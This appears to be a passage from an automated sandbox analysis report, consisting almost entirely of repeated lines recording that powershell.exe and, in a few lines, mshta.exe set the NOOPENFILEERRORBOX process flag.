      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
